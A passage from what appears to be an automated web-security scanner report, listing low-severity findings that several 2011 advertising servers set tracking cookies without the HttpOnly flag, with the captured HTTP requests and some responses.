UTPROFILES=15141%239%3A1%2C19%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C2%7C1022%3A31_28%2C7_27%2C34_1%2C13%7C1023%3A31_28%2C7_27%2C35_1%2C13%7C1146%3A1%2C12%7C1147%3A1%2C12%7C1153%3A1%2C12%7C1158%3A1%2C12%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C11%7C2878%3A1%2C12%7C2881%3A1%2C12%7C2882%3A1%2C14%7C2894%3A1%2C12%7C2897%3A1%2C12%7C2898%3A1%2C13%7C2900%3A1%2C13%7C2901%3A1%2C13%7C2903%3A1%2C14%7C2909%3A1%2C12%7C2917%3A1%2C12%7C2918%3A1%2C12%7C2922%3A1%2C13%7C2924%3A1%2C13%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.59. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215464]=lmvvy6-12267; expires=Sat, 16-Jul-2011 12:56:30 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:56:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215464&campaignid=38112&zoneid=12267&UTLIA=1&cb=f855a7ae672248dc85ba195ad9ea7b22&bk=lmvvy3&id=ciw39wm7smxs3vlkbbdq1rywp HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228986493&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215487.lmvvpk-12267_215480.lmvvpk-12268_215486.lmvvh3-12268_215483.lmvv8c-12267_215473.lmvv8c-12268_215478.lmvuzs-12268_215465.lmvur6-12268_215464.lmvur6-12267_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvu9v-12267; UTPROFILES=15141%239%3A1%2C14%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%7C1022%3A31_28%2C7_27%2C34_1%2C10%7C1023%3A31_28%2C7_27%2C35_1%2C10%7C1146%3A1%2C10%7C1147%3A1%2C10%7C1153%3A1%2C10%7C1158%3A1%2C10%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C9%7C2878%3A1%2C9%7C2881%3A1%2C10%7C2882%3A1%2C11%7C2894%3A1%2C9%7C2897%3A1%2C9%7C2898%3A1%2C10%7C2900%3A1%2C10%7C2901%3A1%2C10%7C2903%3A1%2C11%7C2909%3A1%2C10%7C2917%3A1%2C10%7C2918%3A1%2C10%7C2922%3A1%2C11%7C2924%3A1%2C11%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.60. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215480]=lmvtp9-12268; expires=Sat, 16-Jul-2011 12:07:57 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:07:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215480&campaignid=38114&zoneid=12268&UTLIA=1&cb=b32739899c77420d91a4201241e9609d&bk=lmvt1a&id=cz6y2qdtfvzjhajx3r2zurq1y HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753; UTPROFILES=15141%239%3A1%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34%7C1023%3A31_28%2C7_27%2C35%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.61. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215467]=lmvwwp-12268; expires=Sat, 16-Jul-2011 13:17:13 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:17:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215467&campaignid=38112&zoneid=12268&UTLIA=1&cb=497ccb9d3ef243fb8de5bab62d29cc49&bk=lmvwwl&id=1kwti4k89i9gz5djgci8w92f2 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308230230612&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTLIA=215480.lmvwo9-12268_215468.lmvwo8-12267_215478.lmvwfe-12268_215481.lmvwfd-12267_215477.lmvw6r-12267_215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215486.lmvvh3-12268_215483.lmvv8c-12267_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753; UTPROFILES=15141%239%3A1%2C21%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C3%7C1022%3A31_28%2C7_27%2C34_1%2C13%7C1023%3A31_28%2C7_27%2C35_1%2C13%7C1146%3A1%2C12%7C1147%3A1%2C12%7C1153%3A1%2C12%7C1158%3A1%2C12%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C11%7C2878%3A1%2C12%7C2881%3A1%2C12%7C2882%3A1%2C14%7C2894%3A1%2C12%7C2897%3A1%2C12%7C2898%3A1%2C13%7C2900%3A1%2C13%7C2901%3A1%2C13%7C2903%3A1%2C14%7C2909%3A1%2C12%7C2917%3A1%2C12%7C2918%3A1%2C12%7C2922%3A1%2C13%7C2924%3A1%2C13%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4; _UTLIA[215470]=lmvwwo-12267; UTID=4fa40dc9ea734290be23eabae06b7886

Response

11.62. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215478]=lmvuzs-12268; expires=Sat, 16-Jul-2011 12:35:52 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:35:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215478&campaignid=38114&zoneid=12268&UTLIA=1&cb=c9f85318a7734371b77167332a62cac3&bk=lmvuzp&id=107vjg84j7fclgd2chdnx9da0 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227748983&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215465.lmvur6-12268_215464.lmvur6-12267_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvu9v-12267_215473.lmvu9v-12268_215487.lmvu19-12267_215480.lmvu19-12268_215486.lmvtsl-12268; UTPROFILES=15141%239%3A1%2C8%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%7C1022%3A31_28%2C7_27%2C34_1%2C6%7C1023%3A31_28%2C7_27%2C35_1%2C6%7C1146%3A1%2C5%7C1147%3A1%2C5%7C1153%3A1%2C5%7C1158%3A1%2C5%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C5%7C2878%3A1%2C5%7C2881%3A1%2C5%7C2882%3A1%2C6%7C2894%3A1%2C5%7C2897%3A1%2C5%7C2898%3A1%2C6%7C2900%3A1%2C6%7C2901%3A1%2C6%7C2903%3A1%2C6%7C2909%3A1%2C5%7C2917%3A1%2C5%7C2918%3A1%2C5%7C2922%3A1%2C6%7C2924%3A1%2C6%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.63. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215473]=lmvu9v-12268; expires=Sat, 16-Jul-2011 12:20:19 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:20:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215473&campaignid=38112&zoneid=12268&UTLIA=1&cb=a02ff87c2c7540de81e6f2daf9a94251&bk=lmvu9s&id=cwgep1u4e4fdqo16rsed5rewn HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308226815761&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215487.lmvu19-12267_215480.lmvu19-12268_215486.lmvtsl-12268_215465.lmvt2w-12268_205196.lljpij-4837; UTPROFILES=15141%239%3A1%2C6%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C4%7C1023%3A31_28%2C7_27%2C35_1%2C4%7C1146%3A1%2C3%7C1147%3A1%2C3%7C1153%3A1%2C3%7C1158%3A1%2C3%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C3%7C2878%3A1%2C3%7C2881%3A1%2C3%7C2882%3A1%2C4%7C2894%3A1%2C3%7C2897%3A1%2C3%7C2898%3A1%2C4%7C2900%3A1%2C4%7C2901%3A1%2C4%7C2903%3A1%2C4%7C2909%3A1%2C3%7C2917%3A1%2C3%7C2918%3A1%2C3%7C2922%3A1%2C4%7C2924%3A1%2C4%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.64. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215481]=lmvwfd-12267; expires=Sat, 16-Jul-2011 13:06:49 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 13:06:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215481&campaignid=38114&zoneid=12267&UTLIA=1&ptm=2978&cb=d6adf3450a4b48e8b60e4787f3c32d9f&bk=lmvwfa&id=4tbs7do7pc9w1so2c5dps5nh0 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229606539&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215477.lmvw6r-12267_215478.lmvw6r-12268_215473.lmvvy6-12268_215464.lmvvy6-12267_215487.lmvvpk-12267_215480.lmvvpk-12268_215486.lmvvh3-12268_215483.lmvv8c-12267_215465.lmvur6-12268_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215481.lmvu9v-12267; UTPROFILES=15141%239%3A1%2C18%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7_1%2C2%7C1022%3A31_28%2C7_27%2C34_1%2C11%7C1023%3A31_28%2C7_27%2C35_1%2C11%7C1146%3A1%2C11%7C1147%3A1%2C11%7C1153%3A1%2C11%7C1158%3A1%2C11%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%2C10%7C2878%3A1%2C10%7C2881%3A1%2C11%7C2882%3A1%2C12%7C2894%3A1%2C10%7C2897%3A1%2C10%7C2898%3A1%2C11%7C2900%3A1%2C11%7C2901%3A1%2C11%7C2903%3A1%2C12%7C2909%3A1%2C11%7C2917%3A1%2C11%7C2918%3A1%2C11%7C2922%3A1%2C12%7C2924%3A1%2C12%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.65. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[215486]=lmvtsl-12268; expires=Sat, 16-Jul-2011 12:09:57 GMT; path=/
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:09:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=215486&campaignid=38114&zoneid=12268&UTLIA=1&cb=aa9ffe437430415e99e737963bcfa26b&bk=lmvtsi&id=9jukc1djsuybpsnec07w2pu98 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308226189910&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215465.lmvt2w-12268_215480.lmvt1e-12268_205196.lljpij-4837; UTPROFILES=15141%239%3A1%2C3%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C2%7C1023%3A31_28%2C7_27%2C35_1%2C2%7C1146%3A1%7C1147%3A1%7C1153%3A1%7C1158%3A1%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%7C2878%3A1%7C2881%3A1%7C2882%3A1%2C2%7C2894%3A1%7C2897%3A1%7C2898%3A1%2C2%7C2900%3A1%2C2%7C2901%3A1%2C2%7C2903%3A1%2C2%7C2909%3A1%7C2917%3A1%7C2918%3A1%7C2922%3A1%2C2%7C2924%3A1%2C2%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4

Response

11.66. http://adsfac.us/ag.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FSQTS036298273=uid=11726255; expires=Fri, 17-Jun-2011 17:25:14 GMT; path=/
FSQTS036=pctl=298273&fpt=0%2C298273%2C&pct%5Fdate=4184&pctm=1&FM37663=1&pctc=37663&FL298273=1&FQ=1; expires=Sat, 16-Jul-2011 17:25:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=QTS036.298273.0&source=js&ord=1282000926 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308245115581&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=pctl=310521&pctc=30686&FQ=2&FM36572=1&FL310545=1&pctm=2&FL310521=1&FM30686=1&fpt=0%2C310545%2C310521%2C&pct%5Fdate=4174

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1045
Content-Type: text/javascript
Expires: Thu, 16 Jun 2011 17:24:14 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSQTS036298273=uid=11726255; expires=Fri, 17-Jun-2011 17:25:14 GMT; path=/
Set-Cookie: FSQTS036=pctl=298273&fpt=0%2C298273%2C&pct%5Fdate=4184&pctm=1&FM37663=1&pctc=37663&FL298273=1&FQ=1; expires=Sat, 16-Jul-2011 17:25:14 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Thu, 16 Jun 2011 17:25:14 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=QTS036.298273.0&CreativeID=37663';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=37663'}
...[SNIP]...

11.67. http://adsfac.us/ag.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FSQTS036=pctl=298272&pctm=2&FM37665=2&pctc=37665&FQ=2&fpt=0%2C298272%2C&pct%5Fdate=4184&FL298272=2; expires=Sat, 16-Jul-2011 17:25:14 GMT; path=/
FSQTS036298272=uid=11725988; expires=Fri, 17-Jun-2011 17:25:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=QTS036.298272.0&source=js&ord=2040463675 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245114139&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=pctl=310521&pctc=30686&FQ=2&FM36572=1&FL310545=1&pctm=2&FL310521=1&FM30686=1&fpt=0%2C310545%2C310521%2C&pct%5Fdate=4174

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1043
Content-Type: text/javascript
Expires: Thu, 16 Jun 2011 17:24:14 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSQTS036=pctl=298272&pctm=2&FM37665=2&pctc=37665&FQ=2&fpt=0%2C298272%2C&pct%5Fdate=4184&FL298272=2; expires=Sat, 16-Jul-2011 17:25:14 GMT; path=/
Set-Cookie: FSQTS036298272=uid=11725988; expires=Fri, 17-Jun-2011 17:25:14 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Thu, 16 Jun 2011 17:25:14 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=QTS036.298272.0&CreativeID=37665';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=37665'}
...[SNIP]...

11.68. http://ak1.abmr.net/is/ads.undertone.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/ads.undertone.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-C5E9D72F609AB56342D7A43E0245695022A8EF521BE07209A26406682CB7991C-904A48D4063CD4A2B8D883C3E57C481D3F95E8CC57DC57EE2F22A5BAE1FD2847; expires=Fri, 15-Jun-2012 12:07:39 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.69. http://ak1.abmr.net/is/r1-ads.ace.advertising.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-8D924653A6AD165FA1658C59BFC8997A1F8EB822854B397005CA94287003661F-07D82B8E18A77F7D44AB45757D02976890E2273CB32400A4EB33B5B9B1CD848E; expires=Fri, 15-Jun-2012 12:05:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.70. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-74CDF37F4850BD4C8D8DE84010917B2D1226B72FC9850C1150D49068D09F8B28-D2A3E55F379803A88BD9319A78EBF2F295EC1BA0CE803953EF4EDA79C02798C0; expires=Sat, 16-Jun-2012 10:13:07 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.71. http://ak1.abmr.net/is/www.homedepot.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.homedepot.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-E9885E77E5B9860D4F7D345E12B1431925962914B816377BB179923B4267E957-372CD22D9B6FB828A904F16138738DDA00ACC96A232C784C68F22129BBE3B773; expires=Fri, 15-Jun-2012 11:27:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.72. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959888/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 16 Jun 2010 18:53:18 GMT; path=/; domain=.questionmarket.com
